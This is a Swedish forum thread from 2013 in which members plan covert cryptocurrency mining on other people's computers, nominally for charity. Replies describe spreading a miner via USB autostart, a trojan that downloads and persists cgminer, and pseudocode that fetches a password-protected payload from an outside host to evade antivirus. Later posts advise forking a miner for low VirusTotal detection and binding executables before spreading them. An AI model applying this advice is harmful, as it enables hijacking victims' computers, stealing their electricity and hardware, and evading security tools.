2013-04-13, 11:51
Medlem
MelvinFrohikes avatar
Hejsan, jag startade en tråd för nästan exakt ett år sedan i IT-säk delen ang silent bitcoin mining. Då diskuterades frågan och de man kom fram till var att bitcoinet var för lite värd för att de ska vara värt mödan.
Idag ser situationen annorlunda ut, http://bitcoincharts.com/charts/mtgoxUSD#rg60ztgSzm1g10zm2g25zv

Min tanke var att starta ett projekt här på flashback där man kan dra nytta av varandras kunskaper och idéer och försöka få till ett bra nät där det bara ska vara bitcoin funktionen som är det primära, alla eventuella bitcoins går oavkortat till välgörenhet. Allt handlar självfallet om lärande och att lära sig mer om IT säkerhet.

Hur skulle man kunna utforma ett projektet?
Följer det flashbacks regler?
Är det omoraliskt?
Ts är dum i huvudet?

mvh Melvin
Citera
2013-04-13, 12:41
Medlem
Lpers avatar
Gör ett program som automatiskt flyttar en BTC-miner till autostart-mappen. Detta program sätter du in på ett USB-minne, sen är det bara att leta upp datorer.
Citera
2013-04-13, 13:33
Medlem
droles avatar
Fundera på om Bitcoins är rätt valuta, just nu tror jag du drar in mer pengar på att mina Litecoins.

Det vanligaste måste vara att du installerar en trojan hos offret som tankar ner cgminer från valfri källa, därefter kör den igång programmet och låter den stå.
Trojen fungerar så att om inte cgminer finns laddar den ner det och startar, finns det startar den bara.

Därefter ligger det i autostart och med mutex för att inte köras flera gånger.

Detta sätt är dock så pass vanligt att den hittas av de flesta antivirus-skydd men är riktigt enkelt och lär inte ta mer än någon timme att skriva ihop.

Edit, självklart finns det också mycket er avancerade trojaner för detta, läste t.ex om ett för inte så längesedan som överklockade grafikkorten automatiskt och installerade drivrutiner för det om det inte fanns, allt för att verkligen kunna få ut max utifrån det.
Senast redigerad av drole 2013-04-13 kl. 13:38.
Citera
2013-04-13, 13:39
Medlem
Jag är nog på. Prövade GUIMiner och kom dock bara upp i 9mhps med min gpu så ingen idé att försöka mine'a där.

Men som sagt, räkna in mig.
Jag hade nog kunnat plocka på mig väldigt många datorer om vi kör på autostart idén. Men hur ska vi fördela pengarna rättvist?

Mvh
Citera
2013-04-13, 13:55
Medlem
droles avatar
Citat:
Ursprungligen postat av SweCrime
Men som sagt, räkna in mig.
Jag hade nog kunnat plocka på mig väldigt många datorer om vi kör på autostart idén. Men hur ska vi fördela pengarna rättvist?

Citat:
Ursprungligen postat av MelvinFrohike
Min tanke var att starta ett projekt här på flashback där man kan dra nytta av varandras kunskaper och idéer och försöka få till ett bra nät där det bara ska vara bitcoin funktionen som är det primära, alla eventuella bitcoins går oavkortat till välgörenhet. Allt handlar självfallet om lärande och att lära sig mer om IT säkerhet.

Sen beror det ju på vad man menar med välgörenhet.
---------
Jag skulle skriva det såhär typ:
Kod:
if 'downloader' not in autorun: add 'downloader' to autorun
if 'C:\miner.exe' not exist:
    download 'http://drole.com/blommor.zip' to file
    extract file to C:\miner.exe using password 'hideDownloadFromAV'
if 'miner.exe' not running: system.os('C:\miner.exe pool.com:3333')

Väldigt enkelt men nog så effektivt.

Edit, för den som inte förstod, min kodsnutt var ingen riktigt kod utan bara en "anteckning".
Senast redigerad av drole 2013-04-13 kl. 14:08.
Citera
2013-04-13, 14:22
Medlem
Haha jaha missade att det skulle gå till välgörenhet. Då skippar jag detta men jag hoppas ni lyckas.

drole det kallas för pseudokod
Citera
2013-04-13, 14:38
Medlem
droles avatar
Citat:
Haha jaha missade att det skulle gå till välgörenhet. Då skippar jag detta men jag hoppas ni lyckas.
Det finns dock inget som gör att du inte kan använda kunskapen till att göra det för egen vinning eller att vi gör om konceptet om vi inser att nästan inga vill vara med om man inte kan vinna något på det.

Citat:
drole det kallas för pseudokod
Mjo, vet det.
Men antog att de som inte förstod att det inte var fungerade kod inte heller visste vad pseudokod var...

Edit, för vidare diskussion, allt ska utgå ifrån att du råkar ha tusen lagliga datorer hemma hos dig själv.
Uppmaning till brott är förbjudet på Flashback och kan resultera i varning och/eller att du blir bannad.
Enligt detta får du dock riktiga det mot en specifik person men inte till alla samtidigt.
Citat:
För att ett inlägg ska omfattas av regeln krävs det att det riktar sig mot en grupp människor och inte till en enskild person. Uppmaning till en enskild person att exempelvis hacka konton eller att sätta eld på en persons bil är inte att betrakta som uppvigling.
Citera
2013-04-13, 18:31
Medlem
MelvinFrohikes avatar
Tanken var att skaffa någon form av downloader eller botherder eller vad man nu vill kalla dem, sedan därifrån ladda ner btc clienten, men frågan är hur man hanterar den personliga fail faktorn att någon missbrukar de för egen vinning, de tål att funderas på.

Edit: Sen måste man kolla om de är ok med flashbacks regler att det är lungt.
Citera
2013-04-16, 21:56
Medlem
cap0s avatar
Har du provat CGMiner?
Citera
2013-04-17, 09:49
Medlem
Mjo, just nu känns det som om Litecoins kommer hjälpa mer än Bitcoins.
Citera
2013-04-17, 23:41
Medlem
cap0s avatar
Citat:
Ursprungligen postat av The3rm
Mjo, just nu känns det som om Litecoins kommer hjälpa mer än Bitcoins.

Bitcoin är fortfarande bättre för botnet mining.
Citera
2013-04-18, 00:56
Medlem
lilZer0s avatar
Du skulle kunna göra en "fork" av till exempel pooler's cpu-miner för att optimera din egna "trojan", på detta sätt kan du få väldigt få träffar på virustotal, på min fork där jag även konverterat till stratum protokollet fick jag 2 av 4X träffar (minnst inte exakt vad "X" var...). Jag silent minar dock Litecoins och inga bitcoins. Då slipper du tusen program för att göra allt och du kan kompilera vad du vill till ett program, som du sedan med hjälp av någon som finns eller skriver en egen "binder" där du "lägger ihop" två körbara filer (tex .exe,.dll filer), sedan sprider du filen.
Citera
  • 1
  • 2

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in